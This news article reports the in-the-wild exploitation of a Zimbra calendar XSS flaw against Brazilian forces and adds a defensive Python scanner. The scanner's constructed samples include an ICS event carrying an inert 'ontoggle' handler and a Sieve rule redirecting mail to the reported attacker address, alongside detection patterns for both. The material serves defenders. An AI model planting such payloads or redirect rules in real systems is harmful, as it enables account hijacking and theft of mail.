
A now-patched security vulnerability in Zimbra Collaboration was exploited as a zero-day in cyberattacks targeting the Brazilian military earlier this year.
The vulnerability, tracked as CVE-2025-27915 (CVSS score: 5.4), is a cross-site scripting (XSS) flaw in the Classic Web Client that stems from insufficient sanitization of HTML content in ICS calendar files.
“When a user views an email message containing a malicious ICS entry, embedded JavaScript is executed via the ontoggle event in the tag,” according to the flaw description in the NIST National Vulnerability Database (NVD).

“This allows an attacker to run arbitrary JavaScript within the victim’s session, potentially leading to rogue actions such as setting email filters to redirect messages to an attacker-controlled address. As a result, an attacker can perform unauthorized actions on the victim’s account, including email redirection and data exfiltration.”
Zimbra addressed the vulnerability in versions 9.0.0 Patch 44, 10.0.13, and 10.1.5, released on January 27, 2025. However, the advisory does not mention that it was exploited in real-world attacks.
However, according to a report published by Strikeready Labs on September 30, 2025, the in-the-wild activity involved an unknown threat actor impersonating the Libyan Navy Protocol Bureau to target Brazilian forces with malicious ICS files that exploited the flaw.
The ICS file contained JavaScript code designed to act as a comprehensive data stealer, siphoning credentials, emails, contacts and shared folders to an external server (“ffrk[.]”). It also searches for emails in a specific folder and adds a malicious Zimbra email filter rule named “Correo” to forward messages to spam_to_junk@proton.me.

To evade detection, the script hides certain user interface elements and executes only if more than 3 days have passed since it last ran.
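The two behaviours described above, HTML event-handler attributes smuggled inside an ICS attachment and a mail filter rule that redirects messages to an outside address, are both things a defender can triage from mail-gateway or mailbox data. The following Python script is an added example written for this article; it is not code from the StrikeReady report, from Zimbra, or from the campaign. The ICS sample and the Sieve filter script are constructed (Zimbra stores user filters as Sieve, but the exact layout here is an assumption; the address and rule name mirror the ones reported), the domain example.org stands in for an organisation's own domain, and the `run()` handler body is inert. The scanner unfolds RFC 5545 continuation lines before matching, because a handler name split across a folded line would slip past a naive line-by-line grep; the `strip_event_handlers` helper shows the class of fix (drop on* attributes) but a production sanitizer should allowlist tags and attributes rather than pattern-strip, and none of this replaces applying the vendor patch.

```python
import re

# Constructed sample ICS file (not from the report): one benign event, one event
# carrying an HTML event-handler attribute, and one where the attribute name is
# split across a folded continuation line.
SAMPLE_ICS = """BEGIN:VCALENDAR
VERSION:2.0
BEGIN:VEVENT
UID:benign-1
SUMMARY:Team meeting
X-ALT-DESC;FMTTYPE=text/html:<b>Agenda:</b> review quarterly numbers
END:VEVENT
BEGIN:VEVENT
UID:suspicious-2
SUMMARY:Protocol invitation
X-ALT-DESC;FMTTYPE=text/html:<details open ontoggle="run()">invite</details>
END:VEVENT
BEGIN:VEVENT
UID:folded-3
SUMMARY:Folded invitation
X-ALT-DESC;FMTTYPE=text/html:<details open onto
 ggle="run()">invite</details>
END:VEVENT
END:VCALENDAR
"""

# HTML event-handler attribute: on<name>=<quoted or bare value>
EVENT_HANDLER_RE = re.compile(r"""\bon([a-z]+)\s*=\s*("[^"]*"|'[^']*'|[^\s>]+)""", re.I)
# Same pattern with leading whitespace, used when stripping the attribute
STRIP_RE = re.compile(r"""\s*\bon[a-z]+\s*=\s*("[^"]*"|'[^']*'|[^\s>]+)""", re.I)


def unfold_ics(text: str) -> str:
    """Undo RFC 5545 line folding: a line starting with space/tab continues the previous one."""
    text = text.replace("\r\n", "\n")
    return re.sub(r"\n[ \t]", "", text)


def iter_events(ics_text: str):
    """Yield (uid, property_lines) for each VEVENT in the unfolded ICS text."""
    current, uid = None, None
    for line in unfold_ics(ics_text).split("\n"):
        if line == "BEGIN:VEVENT":
            current, uid = [], "<no-uid>"
        elif line == "END:VEVENT":
            if current is not None:
                yield uid, current
            current = None
        elif current is not None:
            if line.startswith("UID"):
                uid = line.split(":", 1)[1]
            current.append(line)


def find_event_handlers(ics_text: str):
    """Return [(uid, handler_name)] for every on* attribute found in any property value."""
    hits = []
    for uid, lines in iter_events(ics_text):
        for line in lines:
            # the property value follows the first ':'; parameters sit before it
            value = line.split(":", 1)[1] if ":" in line else line
            for m in EVENT_HANDLER_RE.finditer(value):
                hits.append((uid, "on" + m.group(1).lower()))
    return hits


def strip_event_handlers(html: str) -> str:
    """Remove on* attributes from an HTML fragment (illustrative; prefer an allowlist sanitizer)."""
    return STRIP_RE.sub("", html)


# Constructed Sieve filter script (assumed layout); the rule name and redirect
# address mirror those reported in the campaign.
SAMPLE_SIEVE = '''require ["fileinto", "redirect"];
# Correo
if anyof (header :contains "subject" "invoice") {
    redirect "spam_to_junk@proton.me";
}
# Archive
if header :contains "subject" "newsletter" {
    fileinto "Newsletters";
}
'''

REDIRECT_RE = re.compile(r'redirect\s+"([^"]+)"')


def find_external_redirects(sieve: str, internal_domains):
    """Return redirect targets whose domain is not one of the organisation's own."""
    internal = {d.lower() for d in internal_domains}
    return [addr for addr in REDIRECT_RE.findall(sieve)
            if addr.rsplit("@", 1)[-1].lower() not in internal]


if __name__ == "__main__":
    for uid, handler in find_event_handlers(SAMPLE_ICS):
        print(f"event {uid}: HTML event handler {handler}")
    for addr in find_external_redirects(SAMPLE_SIEVE, ["example.org"]):
        print(f"filter redirects mail to external address {addr}")
```

Run against a mailbox export, `find_event_handlers` gives a list of calendar entries to pull for analysis, and `find_external_redirects` run over each user's Sieve script is a cheap sweep for the post-exploitation filter rule described above, which survives even after the XSS itself is patched.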
It is not clear who is behind the attack at the moment, but earlier this year, ESET revealed that a Russian threat actor known as APT28 had exploited XSS vulnerabilities in various webmail solutions from Roundcube, Horde, MDaemon and Zimbra to gain unauthorized access.
Similar tactics have also been adopted by other hacking groups such as Winter Vivern and UNC1151 (also known as Ghostwriter) to facilitate credential theft.